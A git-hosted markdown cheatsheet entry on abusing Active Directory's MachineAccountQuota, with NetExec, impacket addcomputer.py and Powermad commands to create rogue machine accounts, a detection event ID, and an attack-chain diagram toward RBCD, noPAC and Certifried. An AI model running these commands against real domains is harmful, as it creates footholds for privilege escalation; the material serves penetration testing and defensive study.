daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-47-machineaccountquota-maq-abuse.md (3322B)


      1 ---
      2 title: "Attack #47 β€” MachineAccountQuota (MAQ) Abuse"
      3 description: "By default, any authenticated domain user can create up to 10 computer accounts (controlled by ms-DS-MachineAccountQuota). These attacker-created machine…"
      4 category: active-directory
      5 subcategory: "Privilege & Group Abuse"
      6 tags: ["active-directory"]
      7 tools: ["NetExec", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/🟣 Attack #47 β€” MachineAccountQuota (MAQ) Abuse.md"
     11 ---
     12 # 🟣 Attack #47 β€” MachineAccountQuota (MAQ) Abuse
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 By default, any authenticated domain user can create up to **10 computer accounts** (controlled by `ms-DS-MachineAccountQuota`). These attacker-created machine accounts serve as building blocks for other attacks β€” most notably **RBCD (#17)**, **noPAC (#44)**, and **Certifried (#36)**.
     19 
     20 ***
     21 
     22 ## βš™οΈ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Domain user credentials** | Any authenticated user |
     27 | **MAQ > 0** | Default = 10 |
     28 
     29 ***
     30 
     31 ## πŸ’» Full Commands
     32 
     33 ```bash
     34 # ── Check MAQ value ───────────────────────────────────────────────────────────
     35 nxc ldap DC01.corp.local -u low_user -p 'Password1' -M maq
     36 # Output: MachineAccountQuota: 10
     37 
     38 # ── Create machine account ────────────────────────────────────────────────────
     39 addcomputer.py -computer-name 'FAKE01$' -computer-pass 'FakePass!' \
     40   -dc-ip 10.10.10.10 corp.local/low_user:'Password1'
     41 
     42 # ── Delete machine account ────────────────────────────────────────────────────
     43 addcomputer.py -computer-name 'FAKE01$' -computer-pass 'FakePass!' \
     44   -dc-ip 10.10.10.10 -delete corp.local/low_user:'Password1'
     45 ```
     46 
     47 ```powershell
     48 # ── PowerShell / Powermad ─────────────────────────────────────────────────────
     49 Import-Module .\Powermad.ps1
     50 New-MachineAccount -MachineAccount FAKE01 -Password (
     51   ConvertTo-SecureString 'FakePass!' -AsPlainText -Force
     52 )
     53 
     54 # ── Check MAQ ─────────────────────────────────────────────────────────────────
     55 Get-ADObject -Identity "DC=corp,DC=local" -Properties ms-DS-MachineAccountQuota |
     56   Select ms-DS-MachineAccountQuota
     57 ```
     58 
     59 ***
     60 
     61 ## πŸ›‘οΈ Detection β€” Event IDs
     62 
     63 | Event ID | Source | What to Look For |
     64 |---|---|---|
     65 | **4741** | Security Log (DC) | Computer account created by non-admin user |
     66 
     67 ***
     68 
     69 ## πŸ”— Attack Chain Context
     70 
     71 ```
     72 [MAQ Abuse] ──→ Create machine accounts for RBCD, noPAC, Certifried
     73          β”‚
     74          β”œβ”€β”€β†’ πŸ”— RBCD (#17): needs a controlled machine account
     75          β”œβ”€β”€β†’ πŸ”— noPAC (#44): rename machine account to DC name
     76          β”œβ”€β”€β†’ πŸ”— Certifried (#36): change DNS hostname to DC
     77          └──→ πŸ’€ Defeated by: set MAQ to 0
     78 ```
     79 
     80 ***
     81 
     82 > βœ… **Attack #47 β€” MAQ Abuse complete.**